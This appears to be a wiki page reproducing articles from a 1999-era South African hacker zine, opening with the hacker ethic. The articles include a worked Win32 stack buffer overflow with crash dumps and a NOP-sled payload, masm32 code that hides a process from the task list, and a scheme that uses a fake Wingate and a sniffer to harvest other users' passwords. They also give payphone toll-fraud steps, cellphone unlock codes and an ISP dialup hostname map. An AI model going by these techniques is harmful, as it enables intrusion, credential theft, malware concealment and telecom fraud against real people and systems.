{{{~cpp 1. Access to computers-and anything which might teach you something about the way the world works-should be unlimited and total. Always yield to the Hands-On imperative! 2. All information should be free. 3. Mistrust Authority-Promote Decentralization. 4. Hackers should be judged by their hacking, not bogus criteria such such degrees, age, race, or position. 5. You can create art and beauty on a computer. 6. Computers can change (your) life for the better. 80년대 윤리 강령. 90년대에 새로운 것에 기반한 것이 나왔다지만 나는 80년대 것을 선호한다. 자유롭기 때문에. }}} {{{~cpp .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Principles of Buffer Overflow explained by Jus .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. This article is an attempt to quickly and simply explain everyone's favourite manner of exploiting daemons - The Buffer Overflow. - Huh? - The remote buffer overflow is a very commonly found and exploited bug in badly coded daemons - by overflowing the stack one can cause the software to execute a shell equal to its current UID - thus if the daemon is run as root, like many are, a root shell will be spawned, giving full remote access. A buffer is a block of computer memory that holds many instances of the same data type - an array. Arrays can be static and dynamic, static being allocated at load time and dynamic being allocated dynamically at run time. We will be looking at dynamic buffers, or stack-based buffers, and overflowing, filling up over the top, or breaking their boundaries. A stack has the property of a queue of objects being placed one on top of the other, and the last object placed on the stack will be the first one to be removed. This is called LIFO - or last in first out. An element can be added to the stack (PUSH) and removed (POP). A stack is made up of stack frames, which are pushed when calling a function in code and popped when returning it. The stack pointer (SP) always points to the top of the stack, the bottom of it is static. PUSH and POP operations manipulate the size of the stack dynamically at run time, and its growth will either be down the memory addresses, or up them. This means that one could address variables in the stack by giving their offsets from SP, but as POP's and PUSH's occur these offsets change around. Another type of pointer points to a fixed location within a frame (FP). This can be used for referencing variables because their distances from the FP will not change. - The Overflow - A buffer overflow is what happens when more data is forced into the stack than it can handle. We use this to change the flow of execution of a program - hopefully by executing code of our choice, normally just to spawn a shell. We can change the return address of a function by overwriting the entire contents of the buffer, by overfilling it and pushing data out - this then means that we can change the flow of the program. By filling the buffer up with shellcode, designed to spawn a shell on the remote machine, and overwriting the return address so that it points back into the buffer, we can make the program run the shellcode. This is just a simplified version of what actually happens during a buffer overflow - there is more to it, but the basics are essential to understand if you want to win an argument one day. -jus (jus@security.za.net) [ Epilogue by Wyzewun: Time for a practical example. I did this some time ago on my Dad's Windoze box to explain it to myself: I had downloaded a file on Win32 buffer overflows but I really didn't feel like reading, so I figured it out myself instead. It took me +-20 mins to do the whole thing, but at least I was keeping a log of me trying to get it right so I can just paste it more or less unchanged here - save, of course, for the explanations. Next time I'll get human and actually READ UP on whatever I'm trying to do before I try DO it so I don't waste so much damn time. :/ Anyway, here's the notes... #include #include int main() { char buffer[40]; char buffer2[20]; // This doesn't need to be smaller though cout << "Gimmee a variable\n"; cin >> buffer; strcpy(buffer2, buffer); return 666; } Because strcpy() has no bounds checking, there is an obvious buffer overflow vulnerability here... c:\>overflow Gimmee a variable 12345678901234567890 It executed fine. Now lets try... c:\>overflow Gimmee a variable 123456789012345678901 At this point Windoze cuts in with the following... OVERFLOW caused an invalid page fault in module OVERFLOW.EXE at 015f:00402127. Registers: EAX=0000029a CS=015f EIP=00402127 EFLGS=00000206 EBX=00530000 SS=0167 ESP=0063fe0c EBP=00630031 ECX=0063fdd4 DS=0167 ESI=81596754 FS=1157 EDX=00400031 ES=0167 EDI=00000000 GS=0000 Bytes at CS:EIP: 89 45 e4 50 e8 12 15 00 00 8b 45 ec 8b 08 8b 09 Stack dump: 00000000 81596754 00530000 c0000005 0063ff68 0063fe0c 0063fc3c 0063ff68 00403d18 00407190 00000000 0063ff78 bff8b537 00000000 81596754 00530000 Is this a buffer overflow bug or is this something else we are mistaking for one? Well, let's check, we feed it a good 30 "a" characters and we look at the values of the registers when it dies.... Registers: EAX=0000029a CS=015f EIP=61616161 EFLGS=00000202 EBX=00530000 SS=0167 ESP=0063fe00 EBP=61616161 ECX=0063fddc DS=0167 ESI=81596628 FS=117f EDX=00006161 ES=0167 EDI=00000000 GS=0000 Aaah, see that? EIP is 61616161 - 61 being the hex value of the "a" character, so it's overflowing allright. Now let's exploit it. :) First off, we add the following line into the example C++ proggy above... cout << &buffer2 << "\n"; And when executing the program, the output we get is as follows... 0x0063FDE4 Gimmee a variable Right, so buffer2's address is 0x0063FDE4 - and just in case that's a bit off for some reason - we'll pad it a bit. Padding? Right. Executing the NOP function (0x90) which most CPU's have - just something to do nothing. That way, hopefully, when we overwrite the return address we can land somewhere in the middle of the NOPs, and then just execute along until we get to our shellcode. Errr, I'm not being clear, what I mean is the buffer will look like: [NOPNOPNOPNOP] [SHELLCODE] [NOPNOPNOPNOP] [RET] Shellcode? Right. We can execute pretty much anything we want, and as much as I would like to have interesting shellcode, I don't have the tools to make some on this PC, and I *really* don't feel like going online to rip somebody else's. And so, my choice in shellcode - int 20h - program termination. :) Right!!! So our shellcode is 2 characters, and we can feed the program 24 characters before we start overwriting the return address, so lets have 11 NOP characters on either side of our shellcode just to make it pretty and even looking. Let's try this out... c:\>overflow Gimmee a variable 릱릱릱릱릱먏 릱릱릱릱릱릀歆 c:\> Heeey, I gave it too many characters and it didn't crash. It worked. :) That string in hex would be 9090909090909090909090CD20909090909090909090909063FDE4, the CD20 in the middle being interrupt 20h, and the 63FDE4 being the address of the buffer we're overflowing, which we are setting as the return address, namely 0x0063FDE4. Hopefully you're beginning to see the idea here. If you would like to play around with my example file some more, I included the binary in the general-junk directory of this issue. Have fun! ] /// addition. Ammendment to FK8 by Wyzewun - Released 27th December, 1999 Every single file available on buffer overflow mentions that strcpy(), strcat(), sprintf(), vsprintf(), gets() and loops using getc(), fgetc() and getchar() are problematic but for some reason no-one has noticed that 'cin >>' is also a problem. So yeh, the demonstration overflow code we featured in FK8 has *two* vulnerabilities, and we were exploiting the one we didn't know existed: It just happened to still work because of the padding, heh. ;-P Anyway, cin is an *extremely* commonly used function in C++ code, and it ought to be more widely known that the favoured use of it is insecure. Ditto for improper use of an ifstream. If you insist on using iostream.h (cin and ifstream) then use get() and getline() instead of the '>>' system. Also, some newbies may have been confused by my comment about the buffer2 array which makes no sense. What I *meant* to say (but which got lost due to general braindeadness at the time of writing) is that buffer2 needn't be so much smaller than buffer1: even a single byte is enough. Oh, and as a final correction - Pneuma's addy is satur9@punkass.com and not the one specified in the zine. :) Right, just a small update, but a necessary one. And watch out for FK9, coming your way in February or March 2000! Cheers, Wyzewun }}} {{{~cpp .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Introduction to Assembly Programming by Moe1 .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. This will cover how to write your first program in assembly using DEBUG.COM as shipped with Windows 9x and MS-DOS... C:\party2k>debug - a100 0C1B:0100 jmp 125 (Jumps to direction 125H) 0C1B:0102 [Enter] - e 102 'Happy Birthday FK!!!' 0d 0a '$' [ In function 09 of Int 21, as with most functions of int 21, the string is terminated with a "$" character. - Ed] - a125 0C1B:0125 MOV DX,0102 (Copies string to DX register) [Actually the Segment:Offset address of where in memory the string is stored to DX:DS. Remember each register has a high and low order byte? - Ed] 0C1B:0128 MOV CX,000F (Amount of times the string will be displayed) 0C1B:012B MOV AH,09 (Copies 09 value to AH register) [09 is the function for MS-DOS to call - Ed] 0C1B:012D INT 21 (Displays string) [int 21h is the MS-DOS function call interrupt - Ed] 0C1B:012F DEC CX (Reduces in 1 CX) 0C1B:0130 JCXZ 0134 (If CX is equal to 0 jumps to 0134) 0C1B:0132 JMP 012D (Jumps to direction 012D) 0C1B:0134 INT 20 (Ends the program) 0C74:0136 [ENTER] (Now we start compiling our lil codey, awww how kewt;) - h 0136 0100 - n fkrulez.com - rcx CX 0000 : 0036 - w Writing 00036 bytes - q c:\party2k>fkrulez Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! So now as another practical example, let's look at how we would hide a program from Windoze using masm32. To do this we simply pass the program's process ID to the RegisterService() function thus registering the program as a service, which wont show up in the windows task list. .data ; first we define in our data section szKernel32 db "Kernel32.dll",0 szRSP db "RegisterServiceProcess",0 .code ; now we start the code start: push offset szKernel32 call GetModuleHandle ; get Kernel32.dll handle push offset szRSP push eax call GetProcAddress ; get function address mov ebx, eax ; save our pointer into ebx call GetCurrentProcessId ; get current process id push 1 ; 1 = Register Service, 0 = Unregister Serv. push eax ; process id call ebx ; call RegisterServiceProcess end start We could do this in any language which we can access the Win32 API from really, I just used assembly as an example because it's what we're playing with here. :) [ Some more additions from Wyzewun: And there you have it. If you're interested in getting involved with Assembly Programming, look around at the stuff available in the programming tutorials section of Packetstorm Security and particularly the tutorial available there made by the University of Guadalajara (don't ask me where that is) which is quite detailed. As you get better you will find other resources for ASM coding all over the place, so look around and you shouldn't have much trouble finding what you want. :) PacketStorm also has some great resources for other programming languages like C/C++, Pascal, JavaScript, Perl, Python - you name it. :) Mm, no TCL/TK yet, but I s'pose you can pick that up at other places. Also, try and see if you can get hold of the SAMS MS-DOS Bible - it's what I learnt what I know about assembly from and it's a great reference for DOS/Windoze ASM. Mmm, I'm still using the Second Edition (Covers MS-DOS 3.3) but I'm sure there are newer versions lying around. Well, I hope. Otherwise it won't be much use, now will it? :) ] }}} {{{~cpp .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Fun with "Trojan" Wingates by Wyzewun .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Allright, here's a lame little idea for the purpose of abusing hacker kiddies. Scenario: It's a Sunday afternoon. There is nothing to do. The sun is cooking your brain and you've hardly the energy to move, let-alone actually do something that requires an IQ above that of an oyster. What do you do? Step One +-====-+ Install a Sniffer on your box. There is a nice collection of sniffers at ftp.technotronic.com/unix/network-sniffers or alternatively, if you have friends like Vortexia who are lamer warez kiddies that can leech stuff for you, have a NT/98 box as your gateway and install Sniffer Pro by Network Associates on it. It's a seriously kickass proggy - Even though NAI suck. :P Step Two +-====-+ Anyway, so for lack of anything better to do, lets go to www.cyberarmy.com and look at the list of Wingates. Hmmm... Bullshit, Bullshit, Bullshit - Aaah, here's one that works - lets say - dns.gincorp.co.jp - Right, so now we have a Wingate. Errr... So What? Step Three +-======-+ [drew@kung-fusion]$ cat > phjeeer << seckz #!/bin/bash nc dns.gincorp.co.jp 23 echo shj3esh j0or a fuqn tw1t seckz [drew@kung-fusion]$ chmod 755 phjeeer Step Four +-=====-+ Hmmm. I'm still bored. I know! I think I'll su and edit some random junk into my /etc/inetd.conf or something... Before Eliteness... #telnet stream tcp nowait root /usr/local/libexec/tcpd /usr/libexec/telnetd After Eliteness... telnet stream tcp nowait drew /usr/local/libexec/tcpd /home/drew/phjeeer Now we 'killall -9 -HUP inetd' - loose our connection to that lame IRC session which wasn't even vaguely interesting anyway, and we are now left just as bored as before. Step Five +-=====-+ I'm bored. I think I'll telnet into myself... [drew@kung-fusion]$ telnet leet.bsd.box Trying 192.168.33.3... Connected to leet.bsd.box. Escape character is '^]'. Wingate> A Wingate! Fuqn shit du0d! I'm gonna go back to www.cyberarmy.com and add myself to the Wingate list so peeble can abj00ze me too!@#$% And then... +--==--==-+ Within a few hours, our sniffer logs begin to pick up all sorts of interesting things like usernames and passwords for things people shouldn't be accessing, lamers making fools of themselves on IRC and all sorts of funny stuff. Aaah, at last. Entertainment at the expense of the hacker community. Who says we aren't united, man? I *Love* these guys... But Remember... +--==--==--==-+ This can be dangerous and if you don't select the Wingate to abuse carefully you may end up getting yourself in more trouble than you bargained for. Don't be stupid. :) }}} {{{~cpp __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Various Phone Warez from MercEnarY ._ ,;:;,, _. First off, let's cover phreaking the telkom tetabox fones. Note: Not the big blues ones, those small ones you find in some places [Wyzewun: He's reffering to Telkom's Chatterbox range. You'll recognize it coz it says "Chatterbox" on it - imagine that :P] This technique was picked up by me when trying to phone ppl in Johannesburg when i was at boarding school, and lets you use telkom coin phone to phone for free (not exactly free cause the line still gets charged just not you)... 1) You need access to the plugin point of the phone (some of the older phones have a point where the jack can be attached to the phone, in the newer ones the jack is already attached, therefore you need to find then point where the jack goes into the wall instead) 2) Now dial '080' and wait for the fast engaged signal [Wyzewun: Number unobtainable tone] 3) When you have the signal quickly take the jack out of the connection point and put it back in, check if the phone has dialing tone and 080 is still printed on the LCD screen, if there is no dialing tone you have moved the line in and out too fast, if the 080 is not printed on the screen you have moved the line too slow 4) Now the phone has 080 on the screen and then you can dial the number you want. Also note that if you want to dial a local number you must enter the area code. Theory behind this: The phone is lead to believe that you are dialing a 080 (toll free) number. Wondering: If you cut a fone line coming out a normal payphone and connect it to so that you have a point where you can connect and disconnect as you please, would this work? [Wyzewun: Yeh] --- Now for How to get mastercode for unlocking cellphones... The code is a combination of the SP code (5 digit) and phone IMEI (15 digit) use mc1.exe and mc2.exe to get the code To view the IMEI of the Cell, press: *#06# Check,Activate or Remove card restrictions #pw+XXXXXXXXXX+1# - Provider-Lock status #pw+XXXXXXXXXX+2# - Network-Lock status #pw+XXXXXXXXXX+3# - Provider(???)-Lock status #pw+XXXXXXXXXX+4# - SimCard-Lock status XXXXXXXXXX (master code) is a 10 digit code, based on the IMEI number of your phone. Press * many times for "p" and "w". Service Provider Codes MTN = 655 10 Vodacom = 655 01 --- Now let's play around a bit with Net monitor on your cellphones (works wif Nokia 51xx and 61xx maybe 3210) Net Monitor is an extended menu on Nokia Phone. This will be a new additional Menu on your Nokia 5110 if you installing this option. For enabling the Net Monitor with a FBUS cable you need the DOS software PCLocals V1.3. The Network Monitor gives you the following information: Carrier number MS RX level in dBM Received signal quality MS TX power level C1 (path loss criterion, used for cell selection and reselection). The range is -99 to 99 RLT (Radio Link timeout) Timeslot Indication of the transmitter status Information on the network parameters TMSI (temporary Mobile Subscriber Identity) Cell Identification (CELL ID, number of the cell being used) MCC (Mobile Country Code) MNC (Mobile Network Code) LAC (location Area Code) Ciphering (on/off) Hopping (on/off) DTX (on/off) Discarding cell barred information Here is a 10 step description for enabling the net monitor (field test display) using PCLocals: Make sure to start PCLocals in plain DOS First don't connect the phone, start the program and ignore the error message. Configure the cable type and com port (hardware com port, not the virtual com port like for the datasuite). Save the settings, quit the program. Connect the phone with the cable and start the program. The phone "boots" as you enter the main menu and all options become available (all menus are white colored). Choose menu 3 (ME Memory Functions). Choose menu 6 (Field Test Display Settings). Now you have the following options: Enter 243 to activate the "big" net monitor (menu 01 to 89 including menus 01 to 19). Enter 242 to activate the "small" net monitor (menu 01 to 19). Enter 241 to deactivate the net monitor. Enter 240 to reset timers (?) Don't forget to confirm your selection with hitting enter (you won't see any reaction but it's necessary) Quit the program, the phone "boots" and enjoy the net monitor All following actions are done with the phone. Go to the menu net monitor and at the test prompt enter 241 to deactivate the net monitor completely. Furtherly you can change from the big net monitor to the small net monitor by entering 242 at the test prompt (if menu net monitor is still available); Note: after that you can't change to the big net monitor again!! Note: if u cant find pclocals use net_monitor.exe, i dunno if it gets the big or small menu MercEnarY sends greetz to: Depach, ReaXioN, BillaBong and IleK All comments should be mailed to MercEnarY at mercenary@sylicon.org ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; }}} {{{~cpp __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. SAIX Dynamic IP System explained by Moe1, Virulent and Jumpers ._ ,;:;,, _. ndf53-01-p01.gt.saix.net [dialup server code]-[subnet unit]-[port assigned].[province].saix.net Province Info ------------- *.ec.saix.net = Eastern Cape *.fs.saix.net = Free State *.gt.saix.net = Gauteng *.kn.saix.net = Kwazulu Natal *.nt.saix.net = Northen Transvaal *.wc.saix.net = Western Cape Dialup server codes ------------------- bfn53 - | bfn53-01.fs.saix.net | Bloemfontein dial up bfw25 - | bfw25-01.saix.net | Beaufort West dial up blm53 - | blm53-01-23.fs.saix.net | Bethlehem dial up bso36 - | bso36-01.ec.saix.net | Bisho dial up cbs53 - | cbs53-01.wc.saix.net | Cape town dial up cis25 - | cis25-01.wc.saix.net | Christiana dial up cn53 - | cn53-01.wc.saix.net | Riversdale dial up ctb53 - | ctb53-01.wc.saix.net | Bellville dial up dps53 - | dps53-01.kn.saix.net | Durban dial up el25 - | el25-01.ec.saix.net | East London dial up epi53 - | epi53-01.kn.saix.net | Empangeni dial up gfr25 - | gfr25-01-s1.saix.net | Graaff-Reinet dial up gw53 - | gw53-01.ec.saix.net | George dial up hwh53 - | hwh53-01.gt.saix.net | Halfway House dial up kby53 - | kby53-01-.fs.saix.net | Kimberley dial up kdp53 - | kdp53-01.gt.saix.net | Krugersdorp dial up kp53 - | kp53-01.nt.saix.net | Klerksdorp dial up kmp53 - | kmp53-01.gt.saix.net | Kempton Park dial up kvn53 - | kvn53-01.gt.saix.net | Kelvinia dial up lt53 - | lt53-01-01.nt.saix.net | Louis Trichardt dial up lys53 - | lys53-01.kn.saix.net | Ladysmith dial up npt53 - | npt53-01.nt.saix.net | Nelspruit dial up pc36 - | pc36-01.nt.saix.net | Potchefstroom dial up pgb53 - | pgb53-01.nt.saix.net | Pietersburg dial up pmb53 - | pmb53-01.kn.saix.net | Pietermaritzburg dial up ppr53 - | ppr53-01.nt.saix.net | Pretoria dial up pss36 - | pss36-01.kn.saix.net | Port Shepstone dial up psw53 - | psw53-01.ec.saix.net | Port Elizabeth dial up qn25 - | qn25-01.saix.net | Queenstown dial up rsb53 - | rsb53-01.gt.saix.net | Rosebank dial up rst36 - | rst36-01.nt.saix.net | Rustenburg dial up sca53 - | sca53-01.nt.saix.net | * swm25 - | swm25-01.saix.net | Swellendam dial up ndf53 - | ndf53-01.gt.saix.net | Newdoornfontein dial up npt25 - | npt25-01.saix.net | Nelspruit dial up ns53 - | ns53-01.nt.saix.net | Nylstroom dial up nwc36 - | nwc23-01.kn.saix.net | Newcastle dial up md25 - | md25-01.saix.net | Middelburg (Cape) dial up md53 - | md53-01.gt.saix.net | Middelburg (Tvl) dial up mmb25 - | mmb25-01.saix.net | Mmabathu dial up mmb53 - | mmb53-01.nt.saix.net | Mmabathu dial up my53 - | my53-01.wc.saix.net | Malmesbury dial up ue53 - | ue53-01.ec.saix.net | Uitenhage dial up uta36 - | uta36-01.ec.saix.net | Umtata dial up up53 - | up53-01.fs.saix.net | Upington dial up vdd53 - | vdd53-01.wc.saix.net | Vredendal dial up ver53 - | ver53-01.nt.saix.net | Vereeniging dial up vkr25 - | vkr25-01.saix.net | Volksrust dial up wkm53 - | wkm53-01.fs.saix.net | Welkom dial up wtk53 - | wtk53-01.gt.saix.net | * woc36 - | woc36-01.wc.saix.net | Worcester dial up ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; }}}